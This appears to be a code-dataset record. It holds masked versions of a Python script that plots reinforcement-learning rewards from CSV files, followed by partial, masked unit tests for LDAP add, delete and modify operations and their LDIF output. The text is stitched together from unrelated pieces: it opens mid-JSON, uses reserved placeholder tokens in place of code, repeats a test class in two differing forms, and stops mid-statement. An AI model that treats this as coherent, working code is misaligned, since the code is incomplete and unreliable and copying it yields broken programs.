"step-2": "<mask token>\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n reward[line_count - 1] = row[1]\n err[line_count - 1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n plt.xlabel('episode')\n plt.ylabel('reward')\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_err(x, y_map, filename):\n labels = list(y_map.keys())\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n for l in labels:\n ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_plot1():\n reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')\n draw_plot(reward, err, filename='sarsa_grid.png')\n reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')\n draw_plot(reward, err, filename='sarsa_cartpole.png')\n reward, err = read_cp_csvdata(100, 
'qlearning_grid_f_1.csv')\n draw_plot(reward, err, filename='qlearning_grid.png')\n reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')\n draw_plot(reward, err, filename='qlearning_cartpole.png')\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'\n )[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_grid_f_1.csv')[0]\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,\n 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_cartpole_f_1.csv')[0]\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'\n )[0]\n qgrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/qlearning_grid_f_1.csv')[0]\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'\n )[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n reward[line_count - 1] = row[1]\n err[line_count - 1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n plt.xlabel('episode')\n plt.ylabel('reward')\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_err(x, y_map, filename):\n labels = list(y_map.keys())\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n for l in labels:\n ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_plot1():\n reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')\n draw_plot(reward, err, filename='sarsa_grid.png')\n reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')\n draw_plot(reward, err, filename='sarsa_cartpole.png')\n reward, err = read_cp_csvdata(100, 
'qlearning_grid_f_1.csv')\n draw_plot(reward, err, filename='qlearning_grid.png')\n reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')\n draw_plot(reward, err, filename='qlearning_cartpole.png')\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'\n )[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_grid_f_1.csv')[0]\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,\n 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_cartpole_f_1.csv')[0]\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'\n )[0]\n qgrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/qlearning_grid_f_1.csv')[0]\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'\n )[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\ndef draw_plot5():\n pass\n",
"step-4": "import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"',\n quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n reward[line_count - 1] = row[1]\n err[line_count - 1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n plt.xlabel('episode')\n plt.ylabel('reward')\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_err(x, y_map, filename):\n labels = list(y_map.keys())\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n for l in labels:\n ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_plot1():\n reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')\n draw_plot(reward, err, filename='sarsa_grid.png')\n reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')\n draw_plot(reward, err, filename='sarsa_cartpole.png')\n reward, 
err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')\n draw_plot(reward, err, filename='qlearning_grid.png')\n reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')\n draw_plot(reward, err, filename='qlearning_cartpole.png')\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'\n )[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_grid_f_1.csv')[0]\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,\n 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_cartpole_f_1.csv')[0]\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'\n )[0]\n qgrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/qlearning_grid_f_1.csv')[0]\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'\n )[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\ndef draw_plot5():\n pass\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n # print(f'\\t{row[0]} works in the {row[1]} department, and was born in {row[2]}.')\n reward[line_count-1] = row[1]\n err[line_count-1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n\n plt.xlabel('episode')\n plt.ylabel('reward')\n\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n\n plt.legend(loc='lower right')\n\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_err(x, y_map, filename):\n labels = list(y_map.keys())\n\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n for l in labels:\n ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n\n plt.show()\n\n\ndef draw_plot1():\n reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')\n draw_plot(reward, err, filename='sarsa_grid.png')\n\n reward, err = 
read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')\n draw_plot(reward, err, filename='sarsa_cartpole.png')\n\n reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')\n draw_plot(reward, err, filename='qlearning_grid.png')\n\n reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')\n draw_plot(reward, err, filename='qlearning_cartpole.png')\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100, 'softmax/sarsa_grid_f_1.csv')[0]\n\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100, 'softmax/sarsa_cartpole_f_1.csv')[0]\n\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n qgrid_map['softmax'] = read_cp_csvdata(100, 'softmax/qlearning_grid_f_1.csv')[0]\n\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, 
filename='q_cp_se.png')\n\n\ndef draw_plot5():\n pass\n\n# draw_plot1()\n",
"step-ids": [
6,
8,
9,
10,
11
]
}
|
[
6,
8,
9,
10,
11
] |
<|reserved_special_token_0|>
class TestModificationOpLDIF(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testReplaceAll(self):
m = delta.Replace('thud')
self.assertEqual(m.asLDIF(), b'replace: thud\n-\n')
<|reserved_special_token_0|>
class OperationTestCase(unittest.TestCase):
"""
Test case for operations on a LDAP tree.
"""
def getRoot(self):
"""
Returns a new LDAP root for dc=example,dc=com.
"""
return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.
DistinguishedName('dc=example,dc=com'))
class TestAddOpLDIF(OperationTestCase):
"""
Unit tests for `AddOp`.
"""
def testAsLDIF(self):
"""
It will return the LDIF representation of the operation.
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))
result = sut.asLDIF()
self.assertEqual(
b'dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n'
, result)
def testAddOpEqualitySameEntry(self):
"""
Objects are equal when the have the same LDAP entry.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(first, second)
def testAddOpInequalityDifferentEntry(self):
"""
Objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',
'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',
'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(first, second)
def testAddOpInequalityNoEntryObject(self):
"""
Objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
sut = delta.AddOp(team_entry)
self.assertNotEqual(sut, {'foo': ['same', 'attributes']})
def testAddOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testAddOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'one', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'other', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testAddOp_DNExists(self):
"""
It fails to perform the `add` operation for an existing entry.
"""
root = self.getRoot()
root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [
'a', 'b'], 'ou': ['HR']})
hr_entry = entry.BaseLDAPEntry(dn=
'ou=Existing Team, dc=example,dc=com', attributes={'foo': [
'dont', 'care']})
sut = delta.AddOp(hr_entry)
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'bar': ['foo'], 'foo': ['bar']}))
self.assertEqual(repr(sut),
"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))"
)
class TestDeleteOpLDIF(OperationTestCase):
"""
Unit tests for DeleteOp.
"""
def testAsLDIF(self):
"""
It return the LDIF representation of the delete operation.
"""
sut = delta.DeleteOp('dc=example,dc=com')
result = sut.asLDIF()
self.assertEqual(b'dn: dc=example,dc=com\nchangetype: delete\n\n',
result)
def testDeleteOpEqualitySameDN(self):
"""
Objects are equal when the have the same DN.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(first, second)
def testDeleteOpEqualityEqualDN(self):
"""
DeleteOp objects are equal if their DNs are equal.
"""
first_dn = distinguishedname.DistinguishedName(stringValue=
'ou=Team,dc=example,dc=com')
first = delta.DeleteOp(first_dn)
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')
second = delta.DeleteOp(second_entry)
third = delta.DeleteOp('ou=Team, dc=example,dc=com')
self.assertEqual(first, second)
self.assertEqual(first, third)
def testDeleteOpInequalityDifferentEntry(self):
"""
DeleteOp objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(first, second)
def testDeleteOpInequalityNoEntryObject(self):
"""
DeleteOp objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
sut = delta.DeleteOp(team_entry)
self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')
def testDeleteOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testDeleteOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testDeleteOp_DNNotFound(self):
"""
If fail to delete when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.DeleteOp('cn=nope,dc=example,dc=com')
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testDeleteOpInvalidDN(self):
"""
Invalid type of DN raises AssertionError
"""
self.assertRaises(AssertionError, delta.DeleteOp, 0)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.DeleteOp('dc=example,dc=com')
self.assertEqual(repr(sut), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
"""
Unit tests for ModifyOp.
"""
def testAsLDIF(self):
"""
It will return a LDIF representation of the contained operations.
"""
sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',
[delta.Add('postaladdress', [
'123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(
'description'), delta.Replace('telephonenumber', [
'+1 408 555 1234', '+1 408 555 5678']), delta.Delete(
'facsimiletelephonenumber', ['+1 408 555 9876'])])
result = sut.asLDIF()
self.assertEqual(
b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n'
, result)
def testInequalityDiffertnDN(self):
"""
Modify operations for different DN are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityDifferentModifications(self):
"""
Modify operations with different modifications are not equal
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityNotModifyOP(self):
"""
Modify operations are not equal with other object types.
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual('cn=john,dc=example,dc=com', sut)
def testInequalityDiffertnOperations(self):
"""
Modify operations for same DN but different operations are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first, second)
def testHashEquality(self):
"""
Modify operations can be hashed and equal objects have the same
hash.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(first, second)
self.assertEqual(first.asLDIF(), second.asLDIF(),
'LDIF equality is a precondition for valid hash values')
self.assertEqual(hash(first), hash(second))
def testHashInequality(self):
"""
Different modify operations have different hash values.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first.asLDIF(), second.asLDIF())
self.assertNotEqual(hash(first), hash(second))
def testModifyOp_DNNotFound(self):
"""
If fail to modify when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',
['bar'])])
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(repr(sut),
"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])"
)
class TestModificationComparison(unittest.TestCase):
def testEquality_Add_True(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Add('k', ['b', 'c', 'd'])
self.assertEqual(a, b)
def testEquality_AddVsDelete_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Delete('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_AttributeSet_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_List_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = ['b', 'c', 'd']
self.assertNotEqual(a, b)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestModificationOpLDIF(unittest.TestCase):
<|reserved_special_token_0|>
def testDelete(self):
m = delta.Delete('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'delete: foo\nfoo: bar\nfoo: baz\n-\n')
<|reserved_special_token_0|>
def testReplace(self):
m = delta.Replace('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'replace: foo\nfoo: bar\nfoo: baz\n-\n')
def testReplaceAll(self):
m = delta.Replace('thud')
self.assertEqual(m.asLDIF(), b'replace: thud\n-\n')
def testAddBase64(self):
"""
LDIF attribute representation is base64 encoded
if attribute value contains nonprintable characters
or starts with reserved characters
"""
m = delta.Add('attr', [':value1', 'value\n\r2'])
self.assertEqual(m.asLDIF(),
b'add: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n')
class OperationTestCase(unittest.TestCase):
"""
Test case for operations on a LDAP tree.
"""
def getRoot(self):
"""
Returns a new LDAP root for dc=example,dc=com.
"""
return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.
DistinguishedName('dc=example,dc=com'))
class TestAddOpLDIF(OperationTestCase):
    """
    Unit tests for `AddOp`.
    """

    def _makeOp(self, dn, attributes):
        # Helper keeping the individual tests focused on their assertions.
        return delta.AddOp(entry.BaseLDAPEntry(dn=dn, attributes=attributes))

    def testAsLDIF(self):
        """
        It will return the LDIF representation of the operation.
        """
        op = self._makeOp(
